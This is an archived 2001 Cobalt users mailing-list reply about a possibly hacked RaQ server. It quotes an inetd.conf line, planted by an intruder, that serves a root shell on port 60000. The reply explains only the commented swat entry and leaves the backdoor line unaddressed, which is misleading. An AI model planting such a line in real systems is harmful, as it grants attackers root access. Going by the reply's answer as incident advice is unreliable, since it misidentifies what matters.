[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: Re:[cobalt-users] IMPORTANT - POSSIBLE HACKS WITH PATCHES!!

Subject: Re: Re:[cobalt-users] IMPORTANT - POSSIBLE HACKS WITH PATCHES!!
From: "Danny Daniels" <dcd@xxxxxxxxxxxxxxxxxx>
Date: Sun Feb 25 22:23:00 2001
List-id: Mailing list for users to share thoughts on Cobalt products. <cobalt-users.list.cobalt.com>

----- Original Message -----
From: "RaQ3" <cobalt@xxxxxxxxxxx>
To: <craignapier@xxxxxxxxxxx>; "Cobalt Users" <cobalt-users@xxxxxxxxxxxxxxx>
Sent: Thursday, February 15, 2001 1:25 AM
Subject: Re:[cobalt-users] IMPORTANT - POSSIBLE HACKS WITH PATCHES!!


> "Craig Napier" <craignapier@xxxxxxxxxxx> wrote on 15.02.01 06:35:44:
> >
> >We just replaced a system that had been hacked over the weekend, and
> >after reading the last post (Another Hack), I checked /etc/inetd.conf
> >on all three boxes.. The one that was just replaced has a new line at
> >the bottom of the file that the other two boxes don't have...
> >
> ># End of inetd.conf
> >#swat      stream  tcp     nowait.400      root /usr/sbin/swat swat
> >60000 stream tcp nowait root /bin/sh sh -i
> >
> >What is port 60000..? Should I just remove this line and reboot the
> >box. .? Just trying to figure out if it's compromised again.. even
> >with all the patches and updates installed *EVEN* before it was
> >brought back online..
>

swat

samba web adminstration tool

check out the man page for more information.

-Danny
 dcd@xxxxxxxxxxxxxxxxxx

References:
- Re:[cobalt-users] IMPORTANT - POSSIBLE HACKS WITH PATCHES!!
  - From: RaQ3

Prev by Date: Re: [cobalt-users] openssh versions
Next by Date: RE: [cobalt-security] [cobalt-users] Another Raq3 Hack
Previous by thread: Re:[cobalt-users] IMPORTANT - POSSIBLE HACKS WITH PATCHES!!
Next by thread: [cobalt-users] IMPORTANT - POSSIBLE HACKS WITH PATCHES!!

Sun Cobalt Users Message Index

Sun Cobalt Users Thread Index